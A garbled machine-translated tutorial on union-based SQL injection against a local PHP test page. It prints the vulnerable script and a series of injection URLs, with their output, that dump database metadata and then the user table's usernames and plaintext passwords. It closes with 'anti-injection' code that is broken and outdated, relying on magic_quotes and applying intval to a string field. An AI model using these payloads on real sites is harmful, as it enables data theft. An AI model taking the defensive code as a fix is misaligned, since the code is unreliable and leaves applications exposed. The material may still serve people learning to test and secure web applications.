1. Code article
<?PHPerror_reporting(0);include(".. /conn.php ");if(isset($_get[' ID '])){ $id=$_get[' ID ']; Echo"You are currently entering ID:".$id." <br> "; $sql= "SELECT * from user where id= '$id' Limit 0,1 '; $res=mysql_query($sql); $row=Mysql_fetch_array($res); if($row){ Echo"You get the data:<br>"; Echo"ID:".$row[' ID ']. " <br> "; Echo"Username:".$row[' username ']. " <br> "; Echo"Password:".$row[' Password ']. " <br> "; } Else{ Echo"Mysql_query error".Mssql_error (); }}Else{ Echo"Please enter ID";}?>
2. Inject the article
Http://localhost/pentest/sql/sql_get_id.php?id=1
You currently input id:1 you get data: ID:1username:adminpassword:pass
To construct a SQL injection statement:
Http://localhost/pentest/sql/sql_get_id.php?id=1 '--+
You are currently typing id:1 ' --the data you get: Id:1username:adminpassword:pass
We can make all sorts of inquiries.
Http://localhost/pentest/sql/sql_get_id.php?id=1 ' and 1=2 Union SELECT @ @datadir, Database (), version ()--+
The data you get:
Id:d:\wamp\bin\mysql\mysql5.5.20\data\
Username:bloodzero
Password:5.5.20-log
Here I explain that the purpose of and 1=2 is to execute the following query statement without executing the preceding query statement;
Well, we continue to inject; access to a certain amount of information will require a password and user name;
Http://localhost/pentest/sql/sql_get_id.php?id=1 ' and 1=2 Union select Current_User (), 2,3--+
You are currently entering Id:1 ' and 1=2 Union select Current_User (), 2,3-The data you get: Id:[email protected]username:2password:3
Note: Sometimes get a high-privileged account, you can directly carry out the right, detailed attention to follow-up;
Http://localhost/pentest/sql/sql_get_id.php?id=1 ' and 1=2 Union select schema_name,2,3 from Information_ Schema.schemata Limit 0,1--+
You are currently entering Id:1 ' and 1=2 Union select schema_name,2,3 from Information_schema.schemata limit 0,1-data you get: Id:information_ Schemausername:2password:3
Note: We can get different values by changing the value of limit 0,1;
Limit M,n
M: Indicates the start of the query results from the beginning of the fetch;
N: How many bars are taken;
Http://localhost/pentest/sql/sql_get_id.php?id=1 ' and 1=2 Union select table_name,2,3 from Information_schema.tables where table_schema=database () limit 0,1--+
You are currently entering Id:1 ' and 1=2 Union select table_name,2,3 from Information_schema.tables where table_schema=database () limit 0,1 --The data you get: Id:userusername:2password:3
Http://localhost/pentest/sql/sql_get_id.php?id=1 ' and 1=2 Union select column_name,2,3 from Information_ Schema.columns where table_name= ' user ' limit 0,1--+
You are currently entering Id:1 ' and 1=2 Union select column_name,2,3 from Information_schema.columns where table_name= ' user ' limit 0,1-you receive Data taken: Id:idusername:2password:3
Note: If the table name here is unsuccessful, it can be replaced with 16 binary
Attached: Aoi Conversion Tool extract code: Yisi
Http://localhost/pentest/sql/sql_get_id.php?id=1 ' and 1=2 union select Id,username,password from user limit 0,1--+
You are currently entering Id:1 ' and 1=2 Union select Id,username,password from user limit 0,1-the data you get: Id:1username:adminpassword:pass
3, anti-injection
For Php+mysql anti-injection: first set the value of Magic_quotes_off to on;
int type
<?PHPerror_reporting(0);include(".. /conn.php ");if(isset($_get[' ID '])){ $id=$_get[' ID ']; $id=intval($id); Echo"You are currently entering ID:".$id." <br> "; $sql= "SELECT * from user where id= '$id' Limit 0,1 '; ...?>
Char type
<?PHPerror_reporting(0);include(".. /conn.php ");if(isset($_get[' ID '])){ $id=$_get[' ID ']; $id=intval($id); /*$search =addslashes ($search); $search =str_replace ("_", "\_", $search); #过滤_ $search =str_replace ("%", "\%", $search); #过滤%*/ Echo"You are currently entering ID:".$id." <br> "; $sql= "SELECT * from user where id= '$id' Limit 0,1 '; $res=mysql_query($sql); ...?>
Sql_injection First Hair